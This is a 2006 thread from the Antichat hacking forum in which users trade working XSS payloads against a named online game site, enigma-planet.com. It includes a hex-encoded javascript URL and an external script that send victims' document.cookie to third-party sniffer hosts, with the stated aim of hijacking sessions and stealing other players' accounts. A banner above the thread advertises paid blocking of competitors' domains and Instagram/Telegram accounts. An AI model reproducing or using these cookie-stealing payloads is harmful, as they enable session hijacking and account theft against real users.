Форум АНТИЧАТ - XSS в enigma-planet

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
XSS в enigma-planet

Опции темы

Поиск в этой теме

Опции просмотра

XSS в enigma-planet

14.08.2006, 14:21

Gho_st

Познающий

Регистрация: 24.06.2005

Сообщений: 79

Провел на форуме:
227039

Репутация: 11

XSS в enigma-planet

вощем давненько нашол что в энтой игре юзается Voc чат
в следствии чего имеется XSS дыра
_http://east.enigma-planet.com/go.php?url=javascript:alert('up')
юзая которую можно перехватить ID сессии на форуме.
Только вот какая трабла после подскановки куков я напрочь не могу азйти в игру-((

14.08.2006, 14:24

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

Провел на форуме:
3986705

Репутация: 1403

Отправить сообщение для bul.666 с помощью ICQ

А там есть session id? (в куках) Если есть, то не вставляй её... А там же еще phpBB стоит...

14.08.2006, 14:39

Gho_st

Познающий

Регистрация: 24.06.2005

Сообщений: 79

Провел на форуме:
227039

Репутация: 11

2 bul.666
всё есть всё вставляю только чёт не прокатывает
если нифпадлу попробуй сделать.. всё с нуля
___
_www.enigma-planet.com/
рег у них приметивный даж подтверждать не заставляют

14.08.2006, 15:00

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

Провел на форуме:
3986705

Репутация: 1403

У тя Скрипт работает только при нажатии попробуй этот:

Цитата:

http://east.enigma-planet.com/go.php?url="><script>alert()</script><noscript>

Тока постоянно обновляется... На снифак кинуть инфу хватит =)

14.08.2006, 15:07

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

Провел на форуме:
3986705

Репутация: 1403

Воть тебе нормальный CSS =)

Цитата:

http://east.enigma-planet.com/misc.php?state=start_info&r_name=%22%3E%3Cscript%3 Ealert()%3C/script%3E%3Cnoscript%3E

14.08.2006, 15:36

Gho_st

Познающий

Регистрация: 24.06.2005

Сообщений: 79

Провел на форуме:
227039

Репутация: 11

норм CSS у меня есть ->

Код:

http://east.enigma-planet.com/go.php?url=go.php?url=%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%27%68%74%74%70%3a%2f%2f%61%6e%74%69%63%68%61%74%2e%72%75%2f%63%67%69%2d%62%69%6e%2f%73%2e%6a%70%67%3f%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b

трабла именно с подстановкой куков

14.08.2006, 16:05

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

Провел на форуме:
3986705

Репутация: 1403

У мя все работает...

Попробуй так...

Создай файл гденить на сервере с содержанием:

Цитата:

img = new Image();
img.src = "http://lamer-lol.h10.ru/snif/foto.php?"+document.cookie;

Тут на мой сниффер... =) И назави его например sniff...

Далле твойа xss будет выглядить так:

Цитата:

http://east.enigma-planet.com/misc.php?state=start_info&r_name="><script src=http://lamer.xost.ru/sniff> </script><noscript>

Логи тут:

http://lamer-lol.h10.ru/snif/log.txt

=)

15.08.2006, 12:05

Gho_st

Познающий

Регистрация: 24.06.2005

Сообщений: 79

Провел на форуме:
227039

Репутация: 11

ты попробуй именно куки подставить и как фатк спереть там акк у когонить
куки у меня нормуль прутся.. но када всё в броузе всё подставляю происходит какая то трабла и я не могу в игру зайти

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
IE XSS Kit	.Slip	Чаты	22	23.10.2006 06:45
Xss черви и вирусы: сообщества уязвимых	Utochka	Чужие Статьи	3	28.08.2006 00:26
Xss	KrikSta	E-Mail	7	24.08.2006 13:34
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход